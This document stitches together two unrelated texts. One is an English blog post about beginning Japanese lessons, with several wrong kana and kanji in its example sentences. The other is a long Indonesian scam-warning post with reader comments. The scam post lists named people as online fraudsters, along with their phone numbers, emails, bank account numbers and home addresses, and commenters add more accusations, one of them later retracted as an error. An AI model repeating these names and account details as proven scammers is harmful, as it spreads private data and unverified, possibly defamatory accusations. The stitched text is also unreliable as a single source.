日本語入門 [にほんご にゅうもん]

Yes, started from 3 weeks ago, I’m trying to learn Japanese. I follow a Japanese class, 2 times a week. We are using a book named Nihongo Nyuumon (日本語入門) or Introduction to Japanese. My teacher or so called as Sensei (先生) in Japanese is a professional Japanese tourist guide.
I will try to re-write what I’ve already learned, to help me to keep my knowledge and also to help another people who want to learn Japanese. The book itself was made by Yogyakarta 日本文化学院 (Nippon Bunka Gakuin). It was written by three Sensei (先生) from Japan, they are Yoshiteru Ito-Sensei, Kazuo Shiina-Sensei and Takayuki Tomita-Sensei on August 1974.

To write the Japanese, I’m using LibreOffice on Ubuntu Linux. I will make an article about how to activate Japanese writing on LibreOffice on another time. It help me a lot to type Kanji automagically (from hiragana to Kanji) [ひらがなから漢字へ]

First Chapter
IKKA (First Lesson) : Watashi To Anata [私とあなた]

Konnichi Wa [こんにちわ]
Watashi wa Yamada desu [私は山田 です。]
Dozo yoroshiku [どおぞよろしく]
Watashi wa Nihonjin desu [私 は日本人です。]
Watashi wa sensei desu [私は先生です。]

Anata wa Ali-san desu ka? [あなたわAliさんですか?]
Hai, watshi wa Ali desu. [はい、わたしわAliです。]
Anata wa Indonesiajin desu ka? [あなたはインドネシア人ですか?]
Hai, so desu. [はい、そうです。]
Anata wa sensei desu ka? [あなたは先生ですか?]
Iie, so dewa arimasen, Watashi wa gakusei desu, [いいえ、そおじゃありません。わたしわがくせいです。]

Kono hito wa dare desu ka? [この人は誰ですか?]
Sono hito wa Lee-san desu. [その人はLeeさんです。]
Sono hito wa dare desu ka? [その人は誰ですか?]
Kono hito wa Wanee-san desu. [この人はWaneeさんです。]
Ano hito wa dare desu ka? [あの人は誰ですか?]
Ano hito wa Nguyen-san desu. [あの人はNguyenさんです。]
Ali-san wa dono hito desu ka?[Aliさんわどの人ですか?]
Ali-san wa ano hito desu. [Aliさんわあの人です。]

Ali-san wa otoko desu. [Aliさんは男です。]
Nguyen-san mo otoko desu. [Nguyenさんも男です。]
Wanee-san wa otoko dewa arimasen. [Waneeさんわ男出羽ありません]
Wanee-san wa onna desu.[Waneeさんは女です。]

Ali-san to Nguyen-san wa otoko desu.
Ali-san mo Nguyen-san mo otoko desu.
Ali-san mo Nguyen-san mo Wanee-san mo gakusei desu.

Penipu Online (Toko/Transaksi Online) II

MODUS PENIPUN JUAL Handpnone dan CAMERA BM ,NO HP selalu GANTI GANTI.. JARINGAN PENIPU INI SANGAT BANYAK.. DAFTAR JARINGAN PENIPU YG SANGAT MERESAHKAN DI JUAl BELI ONLINE : MODUSNYA JUAL BELI HANDPHONE BM ATAU CAMERA BM , PENIPU PENIPU INI SUDAH SANGAT MERESAHKAN..


HATI-HATI PENIPUAN JUAL CAMERA DAN HP BM
AWASSS !!!!AWASSS !!!!AWASSS !!!!
IKLAN GINIAN JANGAN DIPERCAYA
100% PENIPUUUUU…
PENIPUAN SEPERTI INI TELAH BANYAK BEREDAR !!
JANGAN MUDAH PERCAYA……!!!!
BEBERAPA SERI NOMOR HP YG MEREKA PAKAI :
085761xxxxxx (no im3 MEDAN ) , 085762xxxxxx (No im3 MEDAN) , 087867xxxxxx (No XL MEDAN),
087868xxxxxx(No XL MEDAN) , 085270xxxxxx(No AS MEDAN) , 081261(No telkomsel MEDAN) ,
dan banyak no HP seri MEDAN YG LAIN YG MEREKA GUNAKAN..
ANEHNYA MENGAKU DI BATAM
DAFTAR PARA PENIPU HANDPHONE :
– yunita anggraini
HP : 085763344141 –> (ini NO im3 MEDAN)
anggrainiyunita55@yahoo.com
INI BLOG JUAL CAMERANYA :
http://pabrikbesarcamerablackmarket.blogspot.com
INI BLOG JUAL HPNYA:
http://pabrikbesarhandphoneblackmarket.blogspot.com
( INI PENIPU PALING AKTIF.. iklannya sangat BANYAKKKK )
– RAHMAD
HP: 08566366002 –> (ini NO im3 MEDAN )
http://cameradigitalonline.blogspot.com
email: marketonline14@yahoo.com
– WISNU ADITYA
HP : 08576227 8292 (ini NO kartu im3 MEDAN )
Lokasi : pontianak .
http://grosirhandphoneblackmarketilegal.blogspot.com
– NADIA ARINDI
HP : 08576161 2623 (ini NO kartu im3 MEDAN )
Lokasi : DKI,JAKARTA.
http://hpbmoriginalterindonesia.blogspot.com
– HADI SANTOSO
HP : 085362318881 (ini NO kartu AS MEDAN )
Lokasi : Jawa Barat.
http://hadihandphone-laptop.blogspot.com/
– Ade irma
HP : 08561816791 .
Email : ade.irma12@gmail.com
Lokasi : JL. Margayu permai MC 1.No. 12 Bandung
http://toko-handphone-made-in-canada.blogspot.com
– Iqbal arvin
HP : 085760658085 (ini NO im3 MEDAN )
Lokasi: Riau .
http://gudanghandphone-bm.blogspot.com/
– Mhd.Juandi Syahiddin
HP : 085311747184 (ini NO mentari MEDAN )
Lokasi : Yogyakarta D.I.
http://warehouse-mobilephone.co.cc
– NURUL HUDA
ragietio97
HP : 0856-6405-6050 (ini NO im3 MEDAN)
Lokasi : SALATIGA,jawa tengah.
http://WWW.BLACKMARKET-SELLER.CO.CC
– BUDI
HP : 085361710441 (ini NO im3 MEDAN)
Lokasi : JAWA BARAT.
http://blackmarket13.blogspot.com
– Arif Budiman
Phone : 087768133321 (ini NO im3 MEDAN )
Lokasi : Tanjung Pinang.Kep.Riau
Http://grosirhandphoneblackmarket.blogspot.com
– ROMMY AGUSTINUS alias RAGIE TIO.P (NEW)
HP : 085658011846 (ini NO mentari MEDAN )
Telp : 085664056050 (ini NO im3 MEDAN )
Lokasi : Provinsi Riau kota Batam.POnTIANAK.
www.blackmarket-shop.co.cc
– ASEP SEKAR IBRAHIM
Telp : 085714510891
Lokasi : BANDUNG
http://HANDPHONESHOP-ASEPSEKAR.BLOGSPOT.COM
– saptaji(ADITYA)
hp :085761949411 (ini NO im3 MEDAN )
http://www.aditya-selluler.co.cc
– sovia andriani
HP: 087867770223 (ini NO XL MEDAN )
http://gudanghandphoneblackmarketmasakini.blogspot.com/
– darullah
hp :085658050825 (ini NO mentari MEDAN )
email :cristian.sinaga40@yahoo.com
http://toko-handphoneterpercaya.blogspot.com
– subari fardiansyah
hp :085643435932
Lokasi : PONTIANAK,kalimantan barat.
http://www.seller-shop999.co.cc/
– ( abdulsodikin )
hp :085658050793 (ini NO mentari MEDAN )
email : muhhamad.abadi40@gmail.com
http://toko-handphoneterpercaya.blogspot.com
– eliza julianti
HP : 087867770223 (ini NO XL MEDAN )
http://promohandphoneblackmarket–original.blogspot.com/
– DIAN RAHMADANI
wisnu adiya 43
HP: 085763229666 (ini NO im3 MEDAN )
http://handphoneshopblackmarketoriginal.blogspot.com/
– BAMBANG DARMAWAN ARIE PUTRA
HP : 087867730301 (ini NO im3 MEDAN )
HTTP://agenhandphoneblackmarketonline.blogspot.com/
http://donnyarieputrablackmarketshop.blogspot.com/
http://hp-dan-telekom.tokobagus.com/…/promo-agen-blackmarket-online-2564541.html
http://tv-dan-audio-video.tokobagus.com/…/tv-lcd-led-blackmarket-online-se-indonesia-aman-dan-terpercaya-2776408.html
– Hadie Sutanto
HP : 085761011447 (ini NO im3 MEDAN )
http://harga-hpdanlaptop.blogspot.com/
– hendra hadiwijaya
HP : 085715791562
http://wijaya-ponsel888.blogspot.com
– M.Irwan Hasan
HP : 082173626662 (ini NO simpati MEDAN )
irwanhasan30@yahoo.com
http://blackmarketgudanghp.blogspot.com/
– Fahri Saputra
HP : 085761610131 (ini NO im3 MEDAN )
http://cv.ponselblackmarketterpercaya.blogspot.com
– THERESIA LAURA
HP : 085760932402 (ini NO im3 MEDAN )
http://gudang-hp-blackmarket.blogspot.com/
– sintia arfadila
Hp : 085761876220 (ini NO im3 MEDAN )
http://pusathandphonebmse-indonesiaamandante.blogspot.com
– Surya Widjanarko
HP: 085658020877 (ini NO im3 MEDAN )
http://handphonebrandnewblackmarket.blogspot.com/
– nikolas
HP : 085762236651 (ini NO im3 MEDAN )
http://gudangblackmarket-apple.blogspot.com/
– Daniel Andri Wijaya
HP : 087867190526 (ini NO XL MEDAN )
http://www.dawphone.blogspot.com/
– indra pratama
HP : 087869222260 (ini NO XL MEDAN )
indra.pratama@ymail.com
http://gudanghandphoneblackmarketseindonesia.blogspot.com/
– Desi Syarifah Maulida Adni
HP : 08786077733 (ini NO XL MEDAN )
Email: : indo_celluler@rocketmail.com
– Ibu YANA (yana fauziah)
HP : 087868597000 (ini NO XL MEDAN )
http://pusatjualbelihandphoneblackmarket.blogspot.com/
DAFTAR PARA PENIPU DI JUAL CAMERA
– yunita anggraini
HP : 085763344141 (ini NO im3 MEDAN)
INI BLOG JUAL CAMERANYA :
http://pabrikbesarcamerablackmarket.blogspot.com
INI BLOG JUAL HPNYA:
http://pabrikbesarhandphoneblackmarket.blogspot.com
( INI PENIPU PALING AKTIF.. iklannya sangat BANYAKKKK )
– dunia digital
HP : 085763339010 (ini NO im3 MEDAN )
lokasi: Bontang,kalimantan timur
http://gudangnyakameranikonblackmarket.blogspot.com/
http://duniakameradigitalblackmarket.blogspot.com/
– Rully noor rahmad
HP : 085830167610 (ini NO mentari MEDAN )
http://www.cameradigitalterlengkap.blogspot.com/
– salmanfirwandi
HP : 087869993797 (ini NO XL MEDAN )
http://kameradigitaltermurah.blogspot.com/
– aderita
Email: subari.fardiansyah99@gmail.com
HP : :085277419033 (ini NO AS MEDAN )
http://digital-promotions-bm.blogspot.com/
KEBANYAKAN NO HP YG MEREKA PAKAI SEMUA NO HP MEDAN TAPI MENGAKU DARI BATAM RIAU DAN MODAL MEREKA HANYA BLOG GRATISAN…
Harga yang mereka tawarkan sangat menggiurkan, bagaimana tidak tertarik hanya 50% dari harga barang di toko toko resmi aslinya (sangat tidak meyakinkan) Ya mereka selalu beralasan karena ni barang sitaan bea cukai wajar aja…
NOTE :
Penting, bagaimana cara mengetahui modus penipuan
dari para penjual barang elektronik (HP, Laptop, kamera, dll.)
BILA MAU BELI BARANG ONLINE, CHECK DULU :
ALAMAT DAN NOMER REKENING NYA…!!!
JANGAN MUDAH TERGIUR & TERPESONA OLEH IKLAN YANG MURAH DAN MENGGIURKAN
WASPADA DAN HATI-HATI…!!!!
JANGAN TERBURU-BURU..
UTAMAKAN WASPADA…
CARA MENGETAHUI MENGECEK MELACAK SEBUAH TOKO ONLINE APAKAH PENIPU ATAU TIDAK :
1. GOOGLE
ini cara yang paling utama, masukkan kata kunci apa aja bisa no HP, email, nama, no rekening,dll dan lihat hasilnya…dimana saja penjual tersebut tampil…cek satu persatu…jangan cek hasil yang merujuk iklan baris. tapi cek yang berupa website, blog ataupun forum. cari komentar negatif dan positif tentang penjual sebanyaknya.
2. Jangan percaya testimoni komentar puas dari orang yang ada di blognya karena itu adalah hasil rekayasa pribadi…gak percaya????????? lihat aja tanggal pembuatan webnya (berapa lama webnya) dan cek bagian komentar biasanya dimatikan alias gak bisa komen sehingga yang pernah ditipu gak bisa komen disitu. coba lihat contoh penipu yg sempurna di bawah ini
http://distributor02.wordpress.com/bukti-resi-pengiriman-ke-seluruh-indonesia/
jangan percaya dengan bukti di atas karena gambarnya saja sangat kecil (gambar begituan banyak di internet) kayak gak niat ngasih. kalo dia niat kasih kita pasti bisa lihat no resi TIKI/JNE nya sehingga kita bisa tracking/lacak benar tidaknya data tersebut.
mana ada HP BM pake surat pajak…………….kkkkkkkkkkkkkkkkkk
3. kalo teman-teman sangat yakinnya karena sempurnanya web tapi tidak ketemu komentar negatif tentangnya cobalah minta pembayaran melalui REKBER dan sejenisnya, kalo dia benar-benar penjual yg baik tidak akan menolak sama sekali
ROSITA INDAH
085296627019
sepertinya orang Medan Juga
Ini Link iklannya
http://tv-dan-audio-video.tokobagus.com/televisi/dijual-lcd-tv-55-inci-harga-2500000-1283070.html
Tomy
081533333344
http://www.dslr.shop.tc
No rek an. Dini Aulia no. rek. mandiri 106.000.991.5136
mahendra irawan
handphone
muhamad afizal
muhamad wiraperdana
ahmad bahdria
ahmad safroni
satu orang dengan banyak ID dgn stu nmr hp
085761146994
salah satu iklannya
http://fotografi.tokobagus.com/kamera-digital-nikon/nikon-d80-nikkor-lens-af-zoom-70-300mm-f-4-5-6g-2820595.html?l:1
http://fotografi.tokobagus.com/kamera-digital-sony/sony-alpa-500-2820650.html?l:1#
imuliadishop
radittia2
087768060090
lokasi berpindah-pindah
http://http://fotografi.tokobagus.com/kamera-digital-nikon/gudang-camera-digital-canon-nikon-2826582.html?l:3
Update 13/06/2011
tri Purnomo,
elektronik shop onli
085761114835
tripurnomo.center@gmail.com
tripurnomo.center@yahoo.com
http://camerakita.xp3.biz/
salah satu link iklan nya
http://www.bejubel.com/206279/jual-beli-handphone-smartphone-promo-gadget-aplle-iphone-dengan-harga-terjangkau-dan-pastinya-original-100-murah-dan-diskon.html
http://fotografi.tokobagus.com/canon/di-jual-canon-eos-60d-berkondisi-new-2851723.html
penawaran Kamera BM, HP Bm dll.
Banyrizky banten serang
iwan diyanto surakarta
08566221609
salah satu link iklan
http://www.kaskus.us/showthread.php?t=9123676
update 14/06/2011
photo

data diri lengkap sang penipu/ photo diatas
awall3
08994955045
085761946620
089613115997
http://blackmarket69.blogspot.com/
http://pusat-blackmarket.co.cc
http://udin-shop.co.cc
http://pabrikbesarcamerablackmarket.blogspot.com
rekening dia pake Danamon 003525905851 / AWALUDDIN
salah satu link peloporan korban penipuannya
http://www.kaskus.us/showthread.php?t=9135927
MUHAMMAD riswandi.
Hp : 087768259022 (ini NO XL MEDAN )
Update penipu 15/06/2011
gandungjogja
mahendrayusril
syaiullah anwar
hardimasetyo
alamat berpindah pindah, ada jogja ada riau dan lain 2
yusril.mahendra89@yahoo.com
anwar.syaiful87@gmai
085761947563
salah satu link iklan penipuanya
http://mobil.tokobagus.com/volkswagen/dijual-vw-kombi-79-2832061.html
Daftar Penipu Update 19 – 06 – 2011
Retro Clasicc
ramliii
Aminata4
Aminata
kikiasmina
almuhtar
085763344067
Lokasi Riau, dll
Salah satu link iklannya
http://fotografi.tokobagus.com/canon/canon-7d-plus-lensa-18-135mm-harga-murah-2925049.html?l:1
Tomy
Eky Ramadhan
081973160220
http://dgdigitalshoop.blogspot.com/
Modus jualan sangat banyak, dari kamera, hp, kucing, dll
Andi syahrisyah
Gustami.R
Feri
Andrian Kurniawan
0878 6821 3975
085360538287
email: andi_syahrisyah@yahoo.com
email: Gustamiramadan@yahoo.com
Ym : Seller_Shop999
jual, laptop, kamera, dll
salah satu link iklanya
http://www.bejubel.com/account/view/95167
Manusi ini pada beberapa hari ini menjadi yang paling aktif meng iklankan diri:
Mira putri anggraini
mahmud lukman
Hp. 085664107717
Email: mahmudlukman@ymail.com.
Email: miraputrianggraini@ymail.com
http://miraputrianggrainidigitalblackmarket.blogspot.com/2011/06/mira-putri-anggraini-digital.html
http://camerablackmarketkualitasoriginal.blogspot.com/
Dewi yana
Dewi Anggraini
hp. 081533351333
http://www.handphone-murah.tk/
http://www.handphone-murah.shop.tc/
SALLSA BELLA PUSPITA SARRY
sallssabellapusspita
bellasallssasary
andinilisa86
lisaandini18
andinilisa45
andinilisa72
HP : 085658056002
KOTA : JAWA TIMUR SURABAYA
salah satu link iklanya:
http://fotografi.tokobagus.com/kamera-dslr/menjual-berbagai-jenis-dan-merk-kamera-digital-2922702.html?l:1
Update 29/06/2011
tokohandphone007
ramancell
087867665553
Ym : blackberrybm@yahoo.com
kecurigaan: harga yang ditawarkan terlalu murah
contoh link iklan
http://perangkat-keras-komputer.tokobagus.com/printer-dan-cartridge/printer-epson-r290-dan-epson-r230x-kondisi-99-3025507.html?l=3&pos=24
Putracell
0877 6802 7766
salah satu link iklan
http://handphone.tokobagus.com/nokia/nokia-x2-baru-segel-dan-terjamin-gan-garansi-2805535.html
Nama : Lim Khun Yang
Toko : Mega Cellular & Shop
Alamat Office Kami : Ruko Ramayana Tanjung Pinang, Jalan Wiratno No 16, Tanjung Pinang, Kepri
No Hp :
0857 5051 9888
Email / YM : LelangHp@yahoo.com
web:
http://lelanghp.com/
salah satu link pelaporan penipuannya:
http://www.kaskus.us/showthread.php?s=852ff74b86e40a4aad00dc16fd63b73a&t=8088443
Update 30/06/2011
toko gadget
alamat jawatimur
No. Hp 0838-558-2583
salah satu link iklanya
http://116.90.163.219/search/details?id=2974340&opt=2&pg=1&cid=4597
Liroy Simbiring
08576185015
salah satu link iklanya
http://fotografi.tokobagus.com/kamera-digital-canon/di-jual-kamera-canon-murah-dan-origina-special-liburan-3076658.html?l=1&pos=18
irvan septian
0857 6194 7597
salah satu link iklannya
http://m.bejubel.com/product/related/205899
wijaya richardo
budi wicak
085760857900
salah satu link iklannya
http://fotografi.tokobagus.com/kamera-digital-canon/di-jual-kamera-murah-3076127.html?l=1&pos=35
Berikut Daftar rincian Nomer Hp penipunya :
Nomer Kartu XL :
087768133321
087867770223
087867770223
087867730301
087868597000
08786077733
087869222260
087867190526
087869993797
087768060090
087768259022
08994955045
087868213975
081973160220
087768027766
087867665553
Nomer Kartu AS :
085362318881
085311747184
085361710441
085296627019
085277419033
082173626662
085360538287
Nomer Kartu IM3 :
085761612623
085762278292
08566366002
085763344141
085760658085
08561816791
085664056050
085761949411
085714510891
085664056050
085658011846
085658050793
085643435932
085658050825
085715791562
085761011447
085763229666
085762236651
085658020877
085761876220
085760932402
085761610131
085763339010
085763344141
085761946620
085763344067
085761947563
085664107717
08566221609
085761114835
085761146994
085658056002
085750519888
08576185015
085761947597
085760857900
Nomer kartu Mentari :
085830167610
081533333344
081533351333
Nomer Kartu Tre 3 :
089613115997
Nomer kartu axis
08385582583
sumber : http://purbolinggo.blogspot.com/2011/06/daftar-penipuan-penipu-jual-kamera-baru.html#comment-form
dan
http://www.waspada-penipuan.co.cc/

Untuk Komentar dan Pertanyaan KLIK DISINI

This entry was posted in INFORMASI PENTING, PENIPU ONLINE. Bookmark the permalink.

41 Responses to PENIPU ONLINE TAMBAHAN JULI 2011

  1. may says:
    tolong cek toko online ini…
    celectronik.blogspot.com
    085311281777
  2. bm70com says:
    @ may :
    http://celectronik.blogspot.com/
    adalah PENIPU
    punya id kloningan banyak seperti
    http://indahcelluler.blogspot.com/
    http://rahmansyasaputra.blogspot.com/
    http://rahmansyasaputra.wordpress.com/
    http://anugerahelektronikshop.blogspot.com/
    http://dimashanphone.blogspot.com/
    http://gedungelectronik.blogspot.com/
    http://id-id.facebook.com/rahmansya1
    http://tiarahandphone.multiply.com/
    http://id-id.facebook.com/people/Rahmansya-Saputra/1421091336
    http://id-id.facebook.com/rahmansya1
    http://mantariponsel.blogspot.com/
    No HP lainnya 0852 1777 1401 dan 085333455344
    sudah Kami masukkan pada Daftar Nomor PENIPU
  3. jay says:
    Saudara q semua berhati-hatilah dalam membeli produk toko online karena baik itu yg ada dalam facebook atau web semuanya penipu,,,dan saking pintarnya penipu itu dia akan berkomentar agar semua org percya bahwa toko online itu bs d percya tp semua “BOHONG”.
    Tambahan penipu :
    nama : irwan pratama
    hp : 0853-4364-6161
    (Sejahtera Shop)
    bersama-sama kita berdoa semoga mereka yg mengambil yg bukan haknya akan d sadarkan oleh TUHAN dan akn merasakan apa yg korban mereka rasakan.
    Dan semoga org yg menjadi korban akan makin melimpah rezekinya…amin
    • jay says:
      irwan pratama
      085343646161
      sejahtera shop
      bukan penipu,,bs d percaya…
      Maaf atas kesalahan saya.
      BM70COM katakan :

      Bingung juga,
      Ini katakan Penipu, Ini katakan bukan ???
      Oke bos gini aja..
      JIKA BUKAN PENIPU,
      Saya cek dulu..
      Saya mau beli Blackberry
      BlackBerry® Torch™9800 BM
      yang katanya HARGA Rp.2,400,000,-
      Saya tidak tawar harga !!!
      Saya bayar 2,5 JUTA (plus ongkos)
      Bagaimana ???
      Segera Kontak Kami..
      Soal pembayaran Saya pakai Rekening Bersama
      FJB KASKUS !!!
      Ditunggu Konfirmasi Anda,
      Thanks
      • travis says:
        saya juga bermasalah dgn org yg sama (IRWAN PRATAMA), ini informasi tentang dia :
        no hp 0852-1522-7093
        akun FB : Era Shop (Era Cell Plaza)
        dgn no rek BRI 079201001011506
        bisa di klarifikasi lg utk bang Jay brpa no rek yg kemarin anda melakukan transaksi dengan dia….????
        bisa jadi itu orang yg sama…..sebab dgn saya ini org telah MENIPU……thanx
    • novi suminar says:
      amin
      BM70COM :
      data si PENIPU yang kami minta mana ?
      juga bukti transfer..
      ditunggu lho.
  4. Anak Bali Asli says:
    satu lagi penipu yang dicari malaikat JIBRIL untuk dijbloskan ke NERAKA, Namanya RIZAL HERMAWAN Hp.085378009888, Rek BCA Bandung No.2830622686 merupakan penipu keturunan dari nenek moyang dan leluhurnya, harap teman-teman n saudara-saudaraku semua supaya berhati-hati belanja via internet, ini manusia yang bikin orang jadi takut belanja di internet, jadi saudara kita yang bener-bener dan jujur yang jualan di internet jadi kena imbas sama manusia bajingan satu ini RIZAL HERMAWAN ( nama palsu atau bukan )
  5. penyayang sesama says:
    blog penipu :
    http://indocellulerhandphoneblackmarket.blogspot.com/
    Rudianto Sagala
    rek BRI 1085-01-002288-50-4
  6. jay says:
    Gan tolong d bantu yc,,,sejujurnya q msh bingung dia blg 100% jujur,tp saat d hubungi sangat susah dn saat saya marah dia slalu balas sms yg slalu bs meyakinkan kalo dia bkn penipu.
    Rekber ataupun COD dia slalu mau…
    Tolong d bantu d cek y gan?
    Trims
  7. bm70com says:
    @ jay :
    085343646161 atau Sejahtera Shop Aneh,
    Blognya saja ngak ada isi ??
    Ajak Kami jadi Rekening Bersamanya..
    ( Sebagai Pihak Ketiga )
    Ini menyangkut Reputasi Kami juga !!
    Nanti setelah bapak Transfer pada kami,
    maka akan Kami posting pada Halaman ini..
    dan Kami minta dia agar segera kirim barang..
    Nanti Kami Pantau Resinya.
    Setelah bapak terima barang,
    Dana akan Kami teruskan padanya..
    Bagaimana ?
    Oya.. Saya juga minat BB Torch 9800 harga 2,4jt
    apa bukan Replika ??? barang bekas ??? rusak ??? refurbish ???
    Katakan padanya BM70COM mau beli 2 !!!
    Pakai Rekber lain di Kaskus dsbnya !!
    Serius !!!!!!!!!! Sebab di Sentra Ponsel saja masih kisaran 4jt !
  8. jay says:
    Gan jika q tau dr awal mgkn akn lbh hati2 dn jadikan agan menjadi rekber tp sayang uang hr minggu sdh q tranfer..
    Pertama 2,8 jt (acer aspire 4740G-432G50MN
    kedua 850.000 (DP 50% untk sony vaio VGN….)
    tp sampai skrg gag ada info pengiriman d hubungi sangat sulit,saya tlp JNE Batam katanya gag ada pengiriman untuk saya…
    Kira2 penipu gag gan?
  9. Anak belitung says:
    Irwan pratama
    No.rek : 079201001011506
    Memang penipu sdah byk korbannya.
    Dia ahli NERAKA ..
    • travis says:
      saya jg korban dari PENIPU ini….
      mari kita lacak bersama2 gan….
      minta no rek dia dari bank yg lain biar bisa kita lacak mobilisasinya….
      akun FB PENIPU ini adalah Era Shop (Era Cell Plaza)
      thanx gan
  10. jay says:
    ini nomer rekening BRInya..Irwan pratama
    No.rekening : 079201001011506
    orang yang sama.kita sama2 laporkan k polisi saja.
    @ jay :
    Nanti kita telusuri..
  11. novi suminar says:
    saya tertipu ma si hadi santoso. tapi nama rekening nya atas nama sansulita, pengen banget masukin dia kepenjara, pliiiiiis banuin. ketipu nya banyak. :( tolong bantu jeblosin dia kepenjara. makasi
  12. bm70com says:
    @ novi suminar :
    Kami turut berduka :-(
    Tolong data sipenipu,
    no HP, no REKENING, Nama Toko/FB dll
    dirincikan disini agar mudah untuk pelacakan..
    • novi suminar says:
      dia ngakunya nama nya hadi santoso. ni no telpon nya : 085762201012, 085761949413. blog ny : www.hadihandphone-laptop.blogspot.com. ini no rekeningnya : 105-00-1043983-8 (rek mandiri ) atas nama sansulita. tolong bantu supaya dia masuk penjara.
  13. ridho says:
    pelaku :
    no hp : 085311281777
    rek : BRI, AHMAD SANUSI, 002 113 101 007 763 506
    Mohon ditindak lanjut…
  14. Bonx says:
    Lanjutan dr pesan/postingan saya d halaman ini ( http://bm70.com/?page_id=385#comment-166 ) ,Gan!
    Tolong di cek link ini
    http://www.facebook.com/adiras1, yg ini udah ilang d rekord fesbuk gw mgkn d blok krn udh gw kirim inbox macem2, ada jg yg lain
    http://www.facebook.com/adira.b.shop
    http://www.facebook.com/furyshop
    http://www.facebook.com/adira.b.shop1
    http://www.facebook.com/adira.shop2
    Gw dah kena hampir 10jt cm untuk pembelian BB yg katanya seharga 2jt.
    no HP
    085219402000 ==> Junaidi Harun (ngaku bos) n Sutan Widianto (katanya anak buah si JH)
    085330533000 ==> Resti Wahyuni (ngaku serketaris JH)
    Ngaku pnya alamat
    Batam: Batam Narwana (/Nirwana) Residence blok A5 no.9, RT.03/07, Kel.Batam Lestari, Kec.Sekupang, Batam Centre
    Jakarta: Jl. Melati Indah Blok A5, Gang Raya Timur no.144, Tanah Abang, Jakarta Pusat.
    No Rek
    Mandiri: 1370007803717 a/n Sutan Widianto SE
    BNI: 02115481328 a/n Junaidi Harun SE
    0219029295 a/n Aryanti Dwi Rahayu (katanya orang bea cukai)
    0191065300 a/n Tati Mulyani (katanya orang bea cukai jg)
    Ini data2 yg gw dpt slama sebulan ini nyetor 2jt tiap minggu.
    Pliss..pliss..tolong dicek Gan!!
  15. bm70com says:
    @ bonx :
    Kami sangat prihatin dan gusar dengan PENIPU2 BAJINGAN tsb,
    Cara tercepat untuk menindak mereka adalah :
    bos langsung ke Polsek/Kepolisian terdekat,
    buat Laporan dan minta surat Laporan..
    Kemudian bersama petugas Kepolisian,
    datangi Bank2 PENIPU tsb untuk Minta
    Data Detail si Penipu, kalau bisa diblokir dulu..
    supaya jika masih ada Dana bapak yang belum dicairkan
    ada kemungkinan bisa diselamatkan/diambil.
    Jika Data Detail PENIPU didapat,
    semoga saja bisa ditangkap.
    Kami akan coba lacak si PENIPU,
    Namun cara tercepat adalah seperti Saran Kami diatas.
  16. Yanuar says:
    http://www.m7collection.com
    Apakah ini juga penipu gan mohon bantuannya
  17. bm70com says:
    @ Yanuar :
    http://www.m7collection.com adalah PENIPU 100 %
    sebab semua harganya saja sudah ngak masuk akal !
    NOKIA E7 ORIGINAL 2,3juta masih NEGO ?????????
    Harga Dealernya saja masih diatas 5juta..
    Trus Barang dari Singapore ???
    Black Market macam mana itu ???
    Zaman sekarang sudah ngak ada lagi Black Market,
    Yang ada Pemotongan Jalur Distribusi sehingga Harga
    agak Murah sedikit dan tidak bisa banyak..
    Selisih Rp. 500.000,- Untuk barang bernilai 3 juta itu sudah Hebat :-)
    Karena Kami juga kirim barang dari Singapore,
    paling beda tipis dari Harga Pasaran Lokal disini..
    Kalau memang Pedagang JUJUR,
    Ajak saja pakai Pihak ketiga ( Rekening Bersama )
    yang punya Reputasi Online.. Mau ngak ?
    Kalau ngak mau itu sudah pantas dicurigai !!!
    Testimonial, itu hanya pencatutan Nama2 id Facebook lain..
    Buktikan perkataan Kami, Berhati-hatilah..
  18. santi says:
    saya tertipu dengan no tlp.085394133377…dg rekening BRI,7423-01-000051-50-1 ats nama DJAJAGARA…
    Hati2 sy sdh kirim uang untuk beli hp nokia,dy blg sdh terkirim tp kirimannya ada 3 unit yg ke kirim,sy disuruh trnsfer dana utk brg yg tdk sy pesan,agar brgnya tdk di pending….al hasil,sy ga terima brg,uangnya jg ga kembali…tlg ni di blokir no rek nya…
  19. bm70com says:
    @ santi :
    segera lapor kepolisian terdekat,
    lapor dan minta surat laporan.
    datangi BRI bersama petugas Kepolisian
    untuk minta Detail Pemilik Rekening dan kalau bisa
    Blokir Rekening. Semoga saja Dana tsb belum dicairkan..
    Segera saja bu Santi !!
  20. dany says:
    Hati2 dengan di bawah ini, saya hampir tertipu dan saya sudah cek alamat tidak sesuai dengan nama CV., yang asli dapat di dilihat di blog kota tarakan. No telepon kode batam bukan tarakan yakni 0551. Berikut penipu di bawah:
    Email:
    parli_00@yahoo.com
    AIM:
    pazia
    Phones:
    628876977707
    627782144154
    Address:
    Jl. Sei Mahakam RT.2 No.8 Kel. Kampung Empat
    Tarakan, Indone
  21. bm70com says:
    @ dany :
    Thanks bos atasi Informasi,
    Penting untuk diketahui Publik untuk minimalisasi
    dan mengibiri langkah2 Penipuan yang menyakitkan.
    http://facebook.com/istanaelektronika
    atau
    http://istanaelektronika.blogspot.com/

    juga adalah PENIPU..
    Lihat saja harga2 Mustahil untuk BB Torch
    dan Laptop HP seri G corei5,
    ( Kami tahu persis Modal seri G ini )
  22. gabe says:
    tolong bantuan informasi gan..!! apakah yana Fauziah atau lengkapnya Ibu YANA (yana fauziah)
    HP : 087868597000 (ini NO XL MEDAN ) ini adalah penipu.. soalnya saya mau order hp dari dia. thanks
  23. bm70com says:
    @ gabe :
    087868597000 adalah PENIPU KAKAP,
    sudah masuk Nomor Blacklist yakni Penipu
    pada Database Website Kami KLIK DISINI
    ngak usah diladeni daripada nanti menyesal.
    Jangan tergiur Harga Murah !!!
  24. Dina says:
    Assalamualaikum.. Mau tny sesuatu ni di bwh ini..
  25. Dina says:
    Tolong di cek yg ini tokobuatkitasemua.blogspot.com dan aquariusonlinee.blogspot.com
  26. bm70com says:
    @ Dina :
    tokobuatkitasemua.blogspot.com adalah PENIPU kelas teri,
    1. Harga sudah sangat tidak update,
    mengatakan Jual barang BM, harusnya lebih murah.
    Ini malahan lebih mahal dari Harga Resmi.
    2. kelihatan menipunya contoh ini statementnya di blog :
    SETIAP PEMBELIAN DIATAS 3 UNIT AKAN MENDAPATKAN 1 UNIT BB TORCH
    sedangkan aquariusonlinee.blogspot.com juga merupakan PENIPU sudah diblacklist dibeberapa forum Jual Beli id PENIPU=alifsanusi
    HATI – HATI
  27. Vio says:
    Q pgen bgt bli hp di online tp tkt ktipu..Slisih hrga yg lmyan bwt trtarik skrg lg cba nego ma seseorg yg akun fb ny Bintang Rezki Elektronik kra2 pnipu g y??Mhon bntuan ny
    BM70COM :
